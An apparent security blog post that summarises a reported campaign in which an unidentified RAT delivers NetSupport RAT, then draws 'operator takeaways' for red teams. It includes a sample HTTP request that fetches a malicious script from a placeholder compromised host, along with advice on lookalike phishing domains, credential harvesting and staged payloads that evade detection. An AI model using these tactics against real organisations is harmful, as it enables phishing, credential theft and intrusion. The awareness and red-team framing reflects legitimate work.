In a recent incident documented by SANS Internet Storm Center, a new attack method leverages an unidentified RAT to deploy NetSupport RAT—a powerful remote administration tool. This campaign, which emerged in late 2023, targeted a variety of organizations, indicating a shift towards more complex, multi-stage attack chains. This technique not only showcases the adaptability of threat actors in evading detection but also signifies a heightened level of sophistication in their operational tactics.

The campaign specifically targets industries with significant intellectual property or financial data, including but not limited to technology and finance sectors. Although no single group has claimed responsibility, the use of multiple RATs in a cascading fashion points to an orchestrated effort potentially involving a collaboration of multiple cybercrime outfits. By employing an unidentified RAT initially, threat actors create a veil of anonymity which complicates attribution and incident response efforts.

How It Was Built

The infrastructure for this campaign revolves around a complex, multi-layered delivery system. Threat actors begin by introducing the unidentified RAT through phishing emails, making use of socially engineered content that compels immediate action from the recipient—often masquerading as internal communications or urgent business notifications. An example of such an email might include a subject line: “Confidential: Updated Compliance and Policy Documents”. These emails frequently use spoofed sender identities from domains crafted to closely mirror legitimate organizations, such as hr-update[dot]company[dot]com.

Once the unidentified RAT is successfully deployed onto an endpoint, it acts as a conduit for the subsequent download and execution of the NetSupport RAT. The payload distribution process employs HTTP requests to download malicious scripts from compromised web servers, bypassing traditional email filtering solutions. The flowing HTTP request adequately illustrates this approach:

GET /docs/update_policy.js HTTP/1.1

Host: compromised-asset[dot]com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Why It Worked

This attack’s success is largely attributed to its multilayered nature. Firstly, the initial use of an unidentified RAT rather than directly deploying NetSupport RAT adds a layer of obfuscation, making detection significantly more difficult for defenders who may not expect a dual-RAT setup. By the time the final payload (NetSupport RAT) is delivered, it’s done in a trusted communication channel established by the first RAT.

Secondly, employing legitimate-looking domain names enhances email credibility, increasing click-through and execution rates. Tools like Let’s Encrypt are utilized to issue TLS certificates for these domains, adding another layer of perceived authenticity and trustworthiness, which significantly lowers defensive scrutiny.

The non-linear installation process where the initial RAT functions indirectly rather than aggressively ensures minimal disruption, circumventing behavioral analysis tools which look for overtly malicious actions. The clandestine nature of data communication protocols between the RATs solidifies the delivery chain’s resilience against detection.

Operator Takeaways

Red teamers can glean several insights from this campaign to bolster their own operations. Incorporate multi-stage infection chains that progressively escalate privileges or capabilities. This tactic not only mimics advanced threat actors but also effectively tests an organization’s lateral movement detection capabilities.

Moreover, leveraging lookalike domains in phishing operations can drastically increase user engagement. Experiment with different certificate authorities to issue TLS certificates, ensuring encrypted traffic not only bypasses basic traffic filtering but also enhances the perceived legitimacy of your communication channels.

Good / Better / Best

Good: Implement phishing simulations that utilize lookalike domains to measure click-through rates and harvest credentials effectively.

Better: Design multi-tiered payload deployment strategies that incorporate progressive trust-building mechanisms, such as initial benign payloads that later transition to full remote administration capabilities.

Best: Execute end-to-end attack chains using legitimate communication channels (including HTTPS) to remain undetected throughout the entire engagement process, thus thoroughly assessing an organization’s deep packet inspection capabilities and internal threat intelligence response mechanisms.

References

• SANS Internet Storm Center: New Deployment of NetSupport RAT

• Related Reading

  • What is a RAT in the Context of Phishing?
  • Implementing Command and Control Mechanisms in Phishing Campaigns
  • What is Privilege Escalation in the Context of Phishing?
  • Advanced Command and Control Evasion Techniques

  ---

  Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

  • Tweet